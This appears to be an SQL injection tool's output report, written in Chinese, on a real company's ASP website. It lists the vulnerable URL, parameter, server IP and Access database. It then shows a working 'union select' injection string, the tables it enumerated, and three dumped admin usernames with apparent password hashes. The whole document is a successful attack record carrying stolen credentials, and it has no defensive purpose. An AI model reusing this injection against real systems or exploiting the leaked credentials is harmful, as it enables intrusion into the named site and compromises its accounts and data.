■漏洞信息:============================================================
 ・URL:http://www.cnyhy.com/news.asp?BigClassID=6
 ・页面标题：安防方案-成都永辉园科技有限公司
 ・参数:BigClassID=6
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:121.61.118.139
 ・数据库:Access
 ・HEAD:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Mon, 22 Aug 2011 09:33:33 GMT
Content-Length: 16136
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET


联合查询列数: 总共= 2  显示的列= 2
联合查询SQL: and 3=8 union select 1,2 from MSysAccessObjects
找到表:admin
找到字段:admin.id
找到表:admin
找到表:user
找到字段:admin.id
------------------------------------------------------------
password		username		
237bf19668609cf3		sfmlr520
b59d251571c55a79		admin
f3c658c060b3565a		sfmlr521
